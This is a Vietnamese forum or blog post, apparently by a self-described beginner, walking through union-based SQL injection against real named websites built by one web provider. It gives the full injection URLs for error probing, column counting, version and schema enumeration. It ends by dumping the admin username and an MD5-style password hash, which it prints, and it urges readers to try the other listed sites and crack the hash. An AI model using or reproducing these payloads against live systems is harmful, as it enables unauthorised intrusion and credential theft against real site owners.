I'm: ......
và theo mình tìm hiểu thi hầu như thì các site đuọc cung cấp từ trang htxp://bygpages.vn/ đều dính lỗi Sql injection, ví dụ như htxp://www.cameralevu.com/, htxp://www.maychieuchothue.com/ . . .
các bạn có thể thử đối với những site này
sau đây thì mình cũng xin hương dẫn sơ qua chút cho các bạn newbie như mình học hỏi
- victim: htxp://www.maychieuchothue.com/
__đầu tiên xác định lỗi: thêm ( ' ) vào trước ( .html ) và dấu ( - ) vào trước chữ ( may )
=> ta được: http://www.maychieuchothue.com/ho-tro-ky...diem'.html
=> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-may-chieu-cong-nghe-lcd-va-dlp-uu-nhuoc-diem''' at line 3
__ xác định sô số column: http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' order by 3-- -.html
* chú ý: không có cái này không được nhé ( -- - )
=> Unknown column '3' in 'order clause'
http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' order by 2-- -.html
=>> không lỗi, vậy nó có 2 column
chỉ có 2 column thôi nên bỏ qua bước xem nó lỗi ở table nào nhé ! ở đây nó lỗi ở số 2
___xác định verseion: http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' union select 1,version()-- -.html
=> ta đc: 5.5.8
__tiếp theo mình sẽ get table:
http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -.html
=> ta được: chungtoi,gioithieu,hotro,loaisb,loaisp,sanpham,sidebar,user,yahoo
tới đây mình tập trung vào table: user
__ get column từ table user:
http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x75736572-- -.html
***: 75736572 đây chữ user sau khi chuyển sang dạng hex, bắt buộc phải làm cái này !
=> ta được 1 đóng như thê này:
id,name,username,password,thuTu,id,name,username,password,thuTu,username,password,username,password,userid,usergroupid,membergroupids,displaygroupid,username,password,passworddate,email,styleid,parentemail,homepage,icq,aim,yahoo,msn,skype,showvbcode,showbirthday,usertitle,customtitle,joindate,daysprune,lastvisit,lastactivity,lastpost,lastpostid,posts,reputation,reputationlevelid,timezoneoffset,pmpopup,avatarid,avatarrevision,profilepicrevision,sigpicrevision,options,birthday,birthday_search,maxposts,startofweek,ipaddress,referrerid,languageid,emailstamp,threadedmode,autosubscribe,pmtotal,pmunread,salt,ipoints,infractions,warnings,infractiongroupids,infractiongroupid,adminoptions,profilevisits,friendcount,friendreqcount,vmunreadcount,vmmoderatedcount,socgroupinvitecount,socgroupreqcount,pcunreadcount,pcmoderatedcount,gmmoderatedcount,assetposthash,fbuserid,fbjoindate,fbname,logintype,fbaccesstoken,newrepcount,post_thanks_user_amount,post_thanks_thanked_posts,post_thanks_thanked_times,topxtab,topxmenu,topxresul
- các bạn đừng có hoa mắt, chúng ta chỉ tập trung vào: username và password thôi, mấy cái kìa get cũng chỉ đc cái thông báo "not found" chứ chẳng có gì đâu
___ get data:
http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' union select 1,group_concat(username,0x7c,password) from user-- -.html
=> ta được: admin|d9e0c8391e50ab616cd531b5bcb95c7e
việc còn lại là tìm cpanel của admin và crack password, ở đây password này mình không crack được, ai crack đuọc thì crack nhé
tới đây hết nhé, có gì không đúng các bác đóng góp ý kiến nhé, mình cũng newbie thôi
_______End TuT_______
Gunakan Google Chrome Untuk Mendapatkan Tampilan Terbaik Blog Ini ( ^_^ )